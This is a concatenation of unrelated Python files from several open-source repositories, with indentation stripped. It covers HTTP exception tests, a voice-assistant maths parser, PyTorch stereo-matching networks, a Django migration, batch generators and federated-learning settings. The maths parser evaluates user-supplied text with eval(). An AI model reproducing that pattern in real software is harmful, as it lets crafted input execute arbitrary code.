"GET", routes["ping"], response=None, json={"errors": [{"title": "Test", "detail": "This is a test."}]}
)
assert str(exc.value) == "Test: This is a test."
def test_message_no_response_json_context(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET",
routes["ping"],
response=None,
json={"errors": [{"title": "Test", "detail": "This is a test.", "context": {"test": 1}}]},
)
assert str(exc.value) == "Test: This is a test. ({'test': 1})"
@pytest.mark.asyncio
@pytest.mark.vcr()
async def test_message_response_json_context(self):
async with MangadexClient() as client:
r = await client.request("get", routes["ping"])
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET",
routes["ping"],
response=r,
json={"errors": [{"title": "Test", "detail": "This is a test.", "context": {"test": 1}}]},
)
assert str(exc.value) == "HTTP 200: Test: This is a test. ({'test': 1})"
def test_message_custom_no_locals(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException("None", "None", None, msg="Test")
assert str(exc.value) == "Test"
def test_message_custom_locals(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException("None", "None", None, msg="{method}: {path}")
assert str(exc.value) == "None: None"
def test_message_no_locals(self):
with pytest.raises(KeyError):
HTTPException("None", "None", None, msg="{i_do_not_exist}")
# File: src/resources/maths_results.py (repo: terminal-flow/personal-assistant, license: Apache-2.0)
import math
def math_results(text):
text_list = text.split(' ')
for i in range(len(text_list)):
# slice comparison avoids an IndexError when 'square' is the last token
if text_list[i:i + 2] == ['square', 'root'] or text_list[i] == '√':
# check for square root and give answer
for i in range(len(text)):
try:
f_number = float(text[i:])
if str(f_number).endswith('.0'):
f_number = int(f_number)
sqrt_num = math.sqrt(f_number)
sqrt_num = round(sqrt_num, 5)
if str(sqrt_num).endswith('.0'):
sqrt_num = int(sqrt_num)
return f'the square root of {f_number} is {sqrt_num}'
except ValueError:
pass
for i in range(len(text_list)):
# slice comparisons avoid an IndexError when the keyword is the last token
if (text_list[i:i + 3] == ['the', 'power', 'of']) or ('^' == text_list[i]) or \
        (text_list[i:i + 2] == ['raised', 'to']):
# check for x raised to the power of x and give answer
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
s_number = float(text_list[-1])
if str(f_number).endswith('.0'):
f_number = int(f_number)
if str(s_number).endswith('.0'):
s_number = int(s_number)
pow_num = math.pow(f_number, s_number)
pow_num = round(pow_num, 5)
if str(pow_num).endswith('.0'):
pow_num = int(pow_num)
return f'{f_number} to the power of {s_number} is {pow_num}'
except ValueError:
pass
if 'squared' in text_list and 'root' not in text_list and '-' in text_list:
# check for x squared
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
sqrd_num = math.pow(f_number, 2)
sqrd_num = round(sqrd_num, 5)
if str(sqrd_num).endswith('.0'):
sqrd_num = int(sqrd_num)
return f'-{f_number} squared is {sqrd_num}'
except ValueError:
pass
elif 'squared' in text_list and 'root' not in text_list:
# check for x squared
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
sqrd_num = math.pow(f_number, 2)
sqrd_num = round(sqrd_num, 5)
if str(sqrd_num).endswith('.0'):
sqrd_num = int(sqrd_num)
return f'{f_number} squared is {sqrd_num}'
except ValueError:
pass
if 'cubed' in text_list and '-' in text_list:
# check for x cubed
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
cbd_num = math.pow(f_number, 3)
cbd_num = round(cbd_num, 5)
if str(cbd_num).endswith('.0'):
cbd_num = int(cbd_num)
return f'-{f_number} cubed is -{cbd_num}'
except ValueError:
pass
elif 'cubed' in text_list:
# check for x cubed
for i in range(len(text_list)):
try:
f_number = float(text_list[i])
if str(f_number).endswith('.0'):
f_number = int(f_number)
cbd_num = math.pow(f_number, 3)
cbd_num = round(cbd_num, 5)
if str(cbd_num).endswith('.0'):
cbd_num = int(cbd_num)
return f'{f_number} cubed is {cbd_num}'
except ValueError:
pass
for i in range(len(text_list)):
if (text_list[i] == '+' or text_list[i] == '-' or text_list[i] == '*'
or text_list[i] == 'x' or text_list[i] == '/'):
# check for simple equations (+, -, *, /) and give answer
for i in range(len(text)):
try:
# the original condition compared a character against type(int)/type(float),
# which is always truthy; check for a digit after the minus sign instead
if text[i] == '-' and i + 1 < len(text) and text[i + 1].isdigit():
text_final = text[i:]
for i in range(len(text_final)):
if text_final[i] == 'x':
text_final = str(text_final).replace('x', '*')
evaled = eval(text_final)
evaled = round(evaled, 5)
if str(evaled).endswith('.0'):
evaled = int(evaled)
return f'the answer is {evaled}'
else:
f_number = float(text[i])
text_final = text[i:]
for i in range(len(text_final)):
if text_final[i] == 'x':
text_final = str(text_final).replace('x', '*')
evaled = eval(text_final)
evaled = round(evaled, 5)
if str(evaled).endswith('.0'):
evaled = int(evaled)
return f'the answer is {evaled}'
except ValueError:
pass
return ''
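The operator branch of `math_results` above boils down to: find the character position where a number starts, replace a spoken `x` with `*`, and `eval` the remainder. A condensed, self-contained sketch of just that path (the function name `simple_eval` is illustrative):

```python
def simple_eval(text):
    """Evaluate the arithmetic tail of a spoken request, e.g. 'what is 2 + 2'."""
    for i in range(len(text)):
        try:
            float(text[i])                      # does a number start here?
        except ValueError:
            continue
        expr = text[i:].replace('x', '*')       # spoken 'x' means multiply
        result = round(eval(expr), 5)
        if str(result).endswith('.0'):
            result = int(result)
        return f'the answer is {result}'
    return ''

print(simple_eval('what is 2 + 2'))  # the answer is 4
```

As in the original, `eval` on user input is only safe for trusted, voice-transcribed arithmetic; a production version would use a proper expression parser.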

# ---- File: deep_dialog/usersims/__init__.py | Repo: ngduyanhece/KB-InfoBot | License: MIT ----
from .usersim_rule import *
from .template_nlg import *
from .s2s_nlg import *
from .user_cmd import *

# ---- File: HybridNet/feature_extraction.py | Repo: GANWANSHUI/HybridNet | License: MIT ----
from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
#from torch.autograd import Variable
import torch.nn.functional as F
from .submodel import convbn, BasicBlock, activation_function
class PSM_feature_extraction(nn.Module):
def __init__(self):
super(PSM_feature_extraction, self).__init__()
self.inplanes = 32
self.firstconv = nn.Sequential(convbn(3, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.layer1 = self._make_layer(BasicBlock, 32, 3, 1, 1, 1)
self.layer2 = self._make_layer(BasicBlock, 64, 16, 2, 1, 1)
self.layer3 = self._make_layer(BasicBlock, 128, 3, 1, 1, 1)
self.layer4 = self._make_layer(BasicBlock, 128, 3, 1, 1, 2)
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.lastconv = nn.Sequential(convbn(320, 128, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(128, 32, kernel_size=1, padding=0, stride=1, bias=False))
def _make_layer(self, block, planes, blocks, stride, pad, dilation):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion), )
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, pad, dilation))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x):
output = self.firstconv(x)
output = self.layer1(output)
output_raw = self.layer2(output)
output = self.layer3(output_raw)
output_skip = self.layer4(output)
output_branch1 = self.branch1(output_skip)
output_branch1 = F.interpolate(output_branch1, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch2 = self.branch2(output_skip)
output_branch2 = F.interpolate(output_branch2, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch3 = self.branch3(output_skip)
output_branch3 = F.interpolate(output_branch3, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch4 = self.branch4(output_skip)
output_branch4 = F.interpolate(output_branch4, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_feature = torch.cat(
(output_raw, output_skip, output_branch4, output_branch3, output_branch2, output_branch1), 1)
output_feature = self.lastconv(output_feature)
return output_feature
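The concatenation feeding `lastconv` above must supply exactly 320 input channels. That number can be sanity-checked with plain arithmetic (a standalone sketch; no torch needed):

```python
# Channel bookkeeping for the SPP-style concatenation in PSM_feature_extraction:
raw_channels = 64       # output_raw, produced by layer2 (BasicBlock, planes=64)
skip_channels = 128     # output_skip, produced by layer4 (BasicBlock, planes=128)
branch_channels = 32    # each pooled branch ends in convbn(128, 32, 1, 1, 0, 1)
num_branches = 4        # branch1 .. branch4

total = raw_channels + skip_channels + num_branches * branch_channels
print(total)  # 320 -> matches convbn(320, 128, 3, 1, 1, 1) in lastconv
```

The half-width variants below follow the same arithmetic with every channel count divided by two (hence `convbn(320 // 2, ...)`).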
class PSM_UNet_S_2_feature(nn.Module):
def __init__(self):
super(PSM_UNet_S_2_feature, self).__init__()
self.inplanes = 16
self.inplanes2 = 32
self.inplanes4 = 64
self.inplanes10 = 160
self.firstconv = nn.Sequential(convbn(3, self.inplanes, 3, 2, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(BasicBlock, self.inplanes, 3, 1, 1, 1)
self.layer2 = self._make_layer(BasicBlock, self.inplanes2, 16, 2, 1, 1)
self.layer3 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 1)
self.layer4 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 2)
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(),
#nn.ReLU(inplace=True)
)
self.lastconv = nn.Sequential(convbn(320 // 2, 128 // 2, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
nn.Conv2d(128 // 2, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.up_sample_1 =nn.Sequential( nn.ConvTranspose2d(32, 32, 3, 2, 1, output_padding=1, bias=False))
self.up_sample_2 = nn.Sequential( nn.ConvTranspose2d(16, 16, 3, 2, 1, output_padding=1, bias=False))
self.output_feature_2 = nn.Sequential(convbn(48, 16, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
activation_function(),
#nn.ReLU(inplace=True),
nn.Conv2d(16, 16, kernel_size=1, padding=0, stride=1, bias=False),
#nn.ReLU(inplace=True)
)
self.output_CSPN = nn.Sequential(
convbn(16 , 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
# nn.ReLU(inplace=True),
activation_function(),
convbn(16, 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(),
convbn(16, 8, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(),
nn.Conv2d(8, 8, 1, 1, 0, bias=False),
)
def _make_layer(self, block, planes, blocks, stride, pad, dilation):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion), )
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, pad, dilation))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x, image_left):
#feature_size = x.size()
output = self.firstconv(x)
output_residual = output
#print("output size:", output.shape)
output = self.layer1(output)
#print("output size:", output.shape)
output_raw = self.layer2(output)
#print("output size:", output_raw.shape)
output = self.layer3(output_raw)
#print("output_residual size:", output_residual.shape)
output_skip = self.layer4(output)
output_branch1 = self.branch1(output_skip)
output_branch1 = F.interpolate(output_branch1, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch2 = self.branch2(output_skip)
output_branch2 = F.interpolate(output_branch2, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch3 = self.branch3(output_skip)
output_branch3 = F.interpolate(output_branch3, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch4 = self.branch4(output_skip)
output_branch4 = F.interpolate(output_branch4, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_feature = torch.cat(
(output_raw, output_skip, output_branch4, output_branch3, output_branch2, output_branch1), 1)
output_feature_1 = self.lastconv(output_feature)
#print("output_feature_1 size:", output_feature_1.shape)
if image_left:
output_feature_2 =self.up_sample_1(output_feature_1)
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = torch.cat((output_feature_2, output_residual), 1 )
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = self.output_feature_2(output_feature_2)
#output_CSPN = F.upsample(output_feature_2, (output_skip.size()[2]*4, output_skip.size()[3]*4), mode='bilinear')
output_CSPN = self.up_sample_2(output_feature_2)
output_CSPN = self.output_CSPN(output_CSPN)
return output_feature_1, output_feature_2, output_CSPN
else:
return output_feature_1
class Hybrid_Net_feature(nn.Module):
def __init__(self, activation_types1 = "ELU"):
super(Hybrid_Net_feature, self).__init__()
self.inplanes = 16
self.inplanes2 = 32
self.inplanes4 = 64
self.inplanes10 = 160
self.firstconv = nn.Sequential(convbn(3, self.inplanes, 3, 2, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
convbn(self.inplanes, self.inplanes, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(BasicBlock, self.inplanes, 3, 1, 1, 1)
self.layer2 = self._make_layer(BasicBlock, self.inplanes2, 16, 2, 1, 1)
self.layer3 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 1)
self.layer4 = self._make_layer(BasicBlock, self.inplanes4, 3, 1, 1, 2)
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128 // 2, 32 // 2, 1, 1, 0, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True)
)
self.lastconv = nn.Sequential(convbn(320 // 2, 128 // 2, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
nn.Conv2d(128 // 2, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.up_sample_1 =nn.Sequential( nn.ConvTranspose2d(32, 32, 3, 2, 1, output_padding=1, bias=False))
self.up_sample_2 = nn.Sequential( nn.ConvTranspose2d(16, 16, 3, 2, 1, output_padding=1, bias=False))
self.output_feature_2 = nn.Sequential(convbn(48, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
convbn(16, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),
convbn(16, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),  # pass the configured activation like the sibling layers
convbn(16, 16, 3, 1, 1, 1),
activation_function(types = activation_types1),
#nn.ReLU(inplace=True),
nn.Conv2d(16, 16, kernel_size=1, padding=0, stride=1, bias=False),
#nn.ReLU(inplace=True)
)
self.output_CSPN = nn.Sequential(
convbn(16 , 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(types = activation_types1),
convbn(16, 16, 3, 1, 1, 1),
# nn.ReLU(inplace=True),
activation_function(types = activation_types1),
convbn(16, 16, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(types = activation_types1),
convbn(16, 8, 3, 1, 1, 1),
#nn.ReLU(inplace=True),
activation_function(types = activation_types1),
nn.Conv2d(8, 8, 1, 1, 0, bias=False),
)
def _make_layer(self, block, planes, blocks, stride, pad, dilation):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion), )
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, pad, dilation))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x, image_left):
#feature_size = x.size()
output = self.firstconv(x)
output_residual = output # 1/2
output = self.layer1(output)
#print("output size:", output.shape)
output_raw = self.layer2(output)
#print("output size:", output_raw.shape)
output = self.layer3(output_raw)
output_skip = self.layer4(output)
output_branch1 = self.branch1(output_skip)
output_branch1 = F.interpolate(output_branch1, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch2 = self.branch2(output_skip)
output_branch2 = F.interpolate(output_branch2, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch3 = self.branch3(output_skip)
output_branch3 = F.interpolate(output_branch3, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_branch4 = self.branch4(output_skip)
output_branch4 = F.interpolate(output_branch4, (output_skip.size()[2], output_skip.size()[3]), mode='bilinear')
output_feature = torch.cat(
(output_raw, output_skip, output_branch4, output_branch3, output_branch2, output_branch1), 1)
output_feature_1 = self.lastconv(output_feature)
#print("output_feature_1 size:", output_feature_1.shape)
output_feature_2 =self.up_sample_1(output_feature_1)
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = torch.cat((output_feature_2, output_residual), 1 )
#print("output_feature_2 size:", output_feature_2.shape)
output_feature_2 = self.output_feature_2(output_feature_2)
if image_left:
output_CSPN = self.up_sample_2(output_feature_2)
output_CSPN = self.output_CSPN(output_CSPN)
return output_feature_1, output_feature_2, output_CSPN
else:
return output_feature_1, output_feature_2

# ---- File: presidio-analyzer/analyzer/__init__.py | Repo: kant/presidio | License: MIT ----
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(
os.path.abspath(__file__))) + "/analyzer")
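The double `dirname` above climbs two directory levels from this file before re-appending `/analyzer` (`abspath` is a no-op once the path is already absolute). A quick illustration with a hypothetical path:

```python
import os.path

# Hypothetical absolute location of this __init__.py inside the repo:
file_path = "/repo/presidio-analyzer/analyzer/__init__.py"
two_up = os.path.dirname(os.path.dirname(file_path))  # -> /repo/presidio-analyzer
print(two_up + "/analyzer")  # /repo/presidio-analyzer/analyzer
```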

# ---- File: custom/aaa/migrations/0008_auto_20190410_1952.py | Repo: kkrampa/commcare-hq | License: BSD-3-Clause ----
# -*- coding: utf-8 -*-
# flake8: noqa
# Generated by Django 1.11.20 on 2019-04-10 19:52
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('aaa', '0007_auto_20190319_2225'),
]
operations = [
migrations.AlterField(
model_name='aggawc',
name='high_risk_pregnancies',
field=models.PositiveIntegerField(help_text='hrp=yes when the ccs record was open and pregnant during the month', null=True),
),
migrations.AlterField(
model_name='aggawc',
name='institutional_deliveries',
field=models.PositiveIntegerField(help_text="add in this month and child_birth_location = 'hospital' regardless of open status", null=True),
),
migrations.AlterField(
model_name='aggawc',
name='total_deliveries',
field=models.PositiveIntegerField(help_text='add in this month regardless of open status', null=True),
),
migrations.AlterField(
model_name='aggvillage',
name='high_risk_pregnancies',
field=models.PositiveIntegerField(help_text='hrp=yes when the ccs record was open and pregnant during the month', null=True),
),
migrations.AlterField(
model_name='aggvillage',
name='institutional_deliveries',
field=models.PositiveIntegerField(help_text="add in this month and child_birth_location = 'hospital' regardless of open status", null=True),
),
migrations.AlterField(
model_name='aggvillage',
name='total_deliveries',
field=models.PositiveIntegerField(help_text='add in this month regardless of open status', null=True),
),
]

# ---- File: agents/NPG/__init__.py | Repo: best99317/Deep-RL-Package | License: MIT ----
from agents.NPG.NPG import *
from agents.NPG.NPG_Softmax import *
from agents.NPG.NPG_Gaussian import *
from agents.NPG.run_npg import *

# ---- File: Problems/Preprocessing/task.py | Repo: DaospinaDLAB/coffee_machine | License: Apache-2.0 ----
sentence = input()
sentence = sentence.replace("!", "")
sentence = sentence.replace(",", "")
sentence = sentence.replace(".", "")
sentence = sentence.replace("?", "")
print(sentence.lower())
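The chain of `replace` calls above can be collapsed into a single pass with `str.translate` — an equivalent sketch (the helper name is illustrative):

```python
def strip_punct_lower(s):
    # Delete the same four punctuation marks in one pass, then lowercase.
    return s.translate(str.maketrans('', '', '!,.?')).lower()

print(strip_punct_lower('Hello, World!'))  # hello world
```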

# ---- File: src/training_utils.py | Repo: talshapira/SASA | License: MIT ----
import numpy as np
from imblearn.keras import balanced_batch_generator
def balanced_generator(features, labels, batch_size, input_shape, use_embedding=False, random_state=None):
indexes = np.arange(len(features)).reshape((len(features), 1))
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 0
while True:
index += 1
if index > steps_per_epoch:
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 1
batch_indexes, batch_labels = next(training_generator)
if not use_embedding:
yield features[batch_indexes].reshape((batch_size,input_shape[0],input_shape[1])), batch_labels
else:
yield features[batch_indexes].reshape((batch_size,input_shape[0])), batch_labels
def generator(features, labels, batch_size):
index = 0
while True:
index += batch_size
if index >= len(features):
batch_features = np.append(features[index-batch_size:len(features)], features[0:index-len(features)], axis=0)
batch_labels = np.append(labels[index-batch_size:len(features)], labels[0:index-len(features)], axis=0)
index -= len(features)
yield batch_features, batch_labels
else:
yield features[index-batch_size:index], labels[index-batch_size:index]
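A quick check of the wrap-around behaviour of `generator` above: when a batch would run past the end of the data, it is padded with samples from the start. The sketch below copies the same logic (renamed `wrap_generator` so it is self-contained) and drives it on toy arrays:

```python
import numpy as np

def wrap_generator(features, labels, batch_size):
    # Same wrap-around batching logic as `generator` above.
    index = 0
    while True:
        index += batch_size
        if index >= len(features):
            batch_features = np.append(features[index - batch_size:len(features)],
                                       features[0:index - len(features)], axis=0)
            batch_labels = np.append(labels[index - batch_size:len(features)],
                                     labels[0:index - len(features)], axis=0)
            index -= len(features)
            yield batch_features, batch_labels
        else:
            yield features[index - batch_size:index], labels[index - batch_size:index]

feats = np.arange(5).reshape(5, 1)
labs = np.arange(5)
gen = wrap_generator(feats, labs, batch_size=2)
print(next(gen)[1])  # [0 1]
print(next(gen)[1])  # [2 3]
print(next(gen)[1])  # [4 0]  <- last batch wraps around to the start
```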
def val_generator(features, labels, val_batch_size):
index = 0
while True:
index += val_batch_size
batch_features, batch_labels = features[index-val_batch_size:index], labels[index-val_batch_size:index]
if index >= len(features):
index = 0
yield batch_features, batch_labels
def balanced_sources_generator(features, sources, labels, batch_size, input_shape, use_embedding=False, random_state=None):
indexes = np.arange(len(features)).reshape((len(features), 1))
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 0
while True:
index += 1
if index > steps_per_epoch:
training_generator, steps_per_epoch = balanced_batch_generator(indexes, labels,
batch_size=batch_size, random_state=random_state)
index = 1
batch_indexes, batch_labels = next(training_generator)
if not use_embedding:
yield [features[batch_indexes].reshape((batch_size,input_shape[0],input_shape[1])), sources[batch_indexes].reshape((batch_size,input_shape[0]))], batch_labels
else:
yield [features[batch_indexes].reshape((batch_size,input_shape[0])), sources[batch_indexes].reshape((batch_size,input_shape[0]))], batch_labels
def sources_generator(features, sources, labels, batch_size):
index = 0
while True:
index += batch_size
if index >= len(features):
batch_features = np.append(features[index-batch_size:len(features)], features[0:index-len(features)], axis=0)
batch_sources = np.append(sources[index-batch_size:len(features)], sources[0:index-len(features)], axis=0)
batch_labels = np.append(labels[index-batch_size:len(features)], labels[0:index-len(features)], axis=0)
index -= len(features)
yield [batch_features, batch_sources], batch_labels
else:
yield [features[index-batch_size:index], sources[index-batch_size:index]] , labels[index-batch_size:index]
def val_sources_generator(features, sources, labels, val_batch_size):
index = 0
while True:
index += val_batch_size
batch_features, batch_labels = features[index-val_batch_size:index], labels[index-val_batch_size:index]
batch_sources = sources[index-val_batch_size:index]
if index >= len(features):
index = 0
yield [batch_features, batch_sources], batch_labels

# ---- File: setting_cifar.py | Repo: aouedions11/SSFL-Benchmarking-Semi-supervised-Federated-Learning | License: MIT ----
"""
##########
Assume the number of UEs is K
***************************************************************************************************************************************
size: size = K + 1 (server);
cp: cp in {2, 4, 8, 16} is the communication frequency; cp = 2 means the UEs and the server communicate every 2 iterations;
basicLabelRatio: basicLabelRatio in {0.0, 0.1, 0.2, ..., 0.9, 1.0} is the degree of data dispersion for each UE;
basicLabelRatio = 0.0 means a UE holds the same number of samples from every class; basicLabelRatio = 1.0 means
all samples owned by a UE belong to a single class;
model: model in {'res', 'res_gn'}; model = 'res' means we use ResNet18 + BN; model = 'res_gn' means we use ResNet18 + GN;
iid: iid in {0, 1}; iid = 1 is the IID data setting; iid = 0 is the non-IID setting;
num_comm_ue: num_comm_ue in {1, 2, ..., K}; the number of UEs that communicate in each iteration;
k_img: the number of training samples used in one epoch;
H: H in {0, 1}; whether to use the grouping-based model averaging method; H = 1 means we use it;
GPU_list: GPU_list is a string; GPU_list = '01' means we use GPU0 and GPU1 for training;
num_data_server: num_data_server in {1000, 4000}, the number of labeled samples held by the server
***************************************************************************************************************************************
"""
import numpy as np
import os
path_setting = './Setting/cifar/'
os.makedirs(path_setting, exist_ok=True)
"""
Exper 1:
(1) 10 users, each one only has access to one class of data, R = 1.0, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 1.0
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting1.npy', dictionary1)
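These saved settings can be read back elsewhere; because `np.save` pickles the dict into a 0-d object array, loading needs `allow_pickle=True` plus `.item()`. A self-contained round-trip sketch (temporary path and minimal dict are illustrative, not the repo's actual loader):

```python
import os
import tempfile

import numpy as np

# Hypothetical temp location standing in for './Setting/cifar/'.
tmp = tempfile.mkdtemp()
np.save(os.path.join(tmp, 'Exper1_setting1.npy'), {'cp': [16], 'iid': 0})

# .item() unwraps the 0-d object array back into a plain dict.
cfg = np.load(os.path.join(tmp, 'Exper1_setting1.npy'), allow_pickle=True).item()
assert cfg == {'cp': [16], 'iid': 0}
```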
"""
Exper 1:
(2) 10 users, R = 0.0, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.0
iid = 1
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting2.npy', dictionary2)
"""
Exper 1:
(3) 10 users, R = 0.2, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.2
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
